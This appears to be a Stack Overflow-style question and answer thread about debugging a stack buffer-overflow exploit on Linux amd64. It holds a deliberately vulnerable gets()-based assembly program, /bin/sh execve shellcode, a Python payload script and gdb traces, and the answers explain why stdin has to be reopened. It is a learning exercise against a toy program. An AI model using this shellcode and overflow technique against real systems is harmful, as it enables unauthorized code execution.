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I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine.

Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code)

Vulnerable file buffer.s:

.string "Stackpointer %p\n"
.string "Jump to %p\n"
.global main
    push %rbp
    mov %rsp, %rbp

    sub $120,  %rsp

    # calling printf without setting rax
    # to zero results in a segfault. why?
    xor %rax, %rax 
    mov %rsp, %rsi
    mov $.fmtsp, %rdi
    call printf

    mov %rsp, %rdi
    call gets

    xor %rax, %rax
    mov $.fmtjump, %rdi
    mov 8(%rbp), %rsi
    call printf

    xor %rax, %rax


.global main
    mov $0x68732f6e69622fff, %rbx
    shr $0x8, %rbx
    push %rbx
    mov %rsp, %rdi
    xor %rsi, %rsi
    xor %rdx, %rdx
    xor %rax, %rax
    add $0x3b, %rax


shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
stackpointer = "\x7f\xff\xff\xff\xe3\x28"
output = shellcode
output += 'a' * (120 - len(shellcode)) # fill buffer
output += 'b' * 8 # override stored base pointer
output += ''.join(reversed(stackpointer))
print output

Compiled with:

$ gcc -o buffer buffer.s
$ gcc -o shellcode shellcode.s

Started with:

$ python exploit.py | ./buffer
Stackpointer 0x7fffffffe328
Jump to 0x7fffffffe328

Debugging with gdb:

$ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb)
$ gdb buffer
(gdb) run < exploit.txt
Starting program: /home/henning/bo/buffer < exploit.txt
Stackpointer 0x7fffffffe308
Jump to 0x7fffffffe308
process 4185 is executing new program: /bin/dash

Program exited normally.
share|improve this question
I suppose %rsi% is argv. Can it be NULL? – Aryabhatta May 18 '10 at 16:50
Executing shellcode directly ("$ ./shellcode") works, so I assume that it should be no problem. The C equivalent #include <stdlib.h> void main() { execve("/bin/sh", NULL, NULL); } starts a shell too. – henning May 18 '10 at 17:18
What is the error you get? Were you able to figure that out (I suppose it is %rax%)? – Aryabhatta May 18 '10 at 17:32
My first guess (syscall fails) was wrong. According to gdb it starts /bin/dash but terminates directly afterwards. See edited question. Thanks for your help so far. – henning May 19 '10 at 9:40
up vote 7 down vote accepted

I'm having pretty much the same problem right now with Ubuntu 9.10 in a VM. Disabled all the security measurements of the OS, and simple exploits like "exit the program and set exit-code to 42" do work, but when trying to open a shell, the program just terminates. Output of gdb is identical:

(gdb) run < exploit.0xbffff3b8 
Starting program: /home/seminar/ubung/target/client < exploit.0xbffff3b8

Enter password: Sorry. Wrong password.
Executing new program: /bin/bash

Program exited normally.

Thing is, I need it working in approx. 16 hours for a presentation :-D

Update: I found this neat study: www.shell-storm.org/papers/files/539.pdf

On page 16 it says: "If we try to execute a shell, it terminates immediately in this configuration"

In other examples that don't use gets(), they do very well spawn a shell. Unfortunately, they don't give a hint on WHY it doesn't work that way. :(

Next Update: It seems it has to do with stdin. The shell cannot properly use the one it gets from the original process. I tried using a minimal shell I found the sourcecode for (evilsh). It crashed at the point where it tried to read input. My guess is, that bash/dash checks for this and just silently exits when something is wrong with stdin.

Ok please don't kill me for having this conversation with myself here, but...

I found a solution!

For some reason it is necessary to reopen the inputs. I found a working shellcode here:


I don't see a prompt tough, but I can run programs etc. using the shell that opens.

share|improve this answer
In my humble opinion, the stdin must be reopened in the shellcode because the shell reads the "end-of-file" from exploit.txt from the shared stdin. To put in another way, when the shell begins, the buffer of stdin contains "end-of-file" because the stdin is shared between the shell and the original program. – feirainy Mar 13 '14 at 1:38

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